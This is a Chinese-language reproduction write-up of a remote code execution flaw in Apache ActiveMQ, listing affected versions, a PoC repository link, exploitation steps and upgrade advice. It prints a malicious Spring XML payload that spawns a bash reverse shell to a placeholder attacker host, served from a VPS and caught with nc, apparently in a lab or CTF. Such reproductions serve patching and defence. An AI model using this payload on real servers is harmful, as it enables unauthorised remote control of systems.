Apache ActiveMQ RCE漏洞复现

1、 产品简介

ActiveMQ是一种开源的基于JMS（Java Message Servie）规范的一种消息中间件的实现，ActiveMQ的设计目标是提供标准的，面向消息的，能够跨越多语言和多系统的应用集成消息通信中间件。ActiveMQ是Apache出品，最流行的，能力强劲的开源消息总线。

2、 漏洞概述

Apache ActiveMQ 中存在远程代码执行漏洞，Apache ActiveMQ在默认安装下开放了61616服务端口，而该端口并没有对传入数据进行适当的过滤，从而使攻击者能够构造恶意数据以实现远程代码执行。

3、 影响范围

Apache ActiveMQ < 5.18.3

Apache ActiveMQ < 5.17.6

Apache ActiveMQ < 5.16.7

Apache ActiveMQ < 5.15.16

4、 漏洞复现

PoC地址：https://github.com/trganda/ActiveMQ-RCE

把项目Get到本地，导入IDEA中运行

因为我电脑上JDK安装的是1.8.0，直接运行会发现报错

所以在此处安装JDK11：

5、 漏洞利用

准备好恶意文件：rec.xml,将其上传到自己的VPS，其中将your-ip改成自己vps地址。

<?xml version="1.0" encoding="UTF-8" ?>

<beans xmlns="http://www.springframework.org/schema/beans"

 xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"

 xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">

 <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">

 <constructor-arg>

 <list>

 <value>bash</value>

 <value>-c</value>

 <value><![CDATA[bash -i >& /dev/tcp/your-ip/6666 0>&1]]></value>

 </list>

 </constructor-arg>

 </bean>

</beans>

修改Main.java以下两处，一个是目标地址，一个是恶意文件地址

在vps中使用python开启http服务

再使用nc实现监听

接着运行Main.java

成功反弹shell，ls查看拿到flag

6、 修复建议

通过网络ACL策略限制访问来源，例如只允许来自特定IP地址或地址段的访问请求。

升级修复：

Apache ActiveMQ >= 5.18.3

Apache ActiveMQ >= 5.17.6

Apache ActiveMQ >= 5.16.7

Apache ActiveMQ >= 5.15.16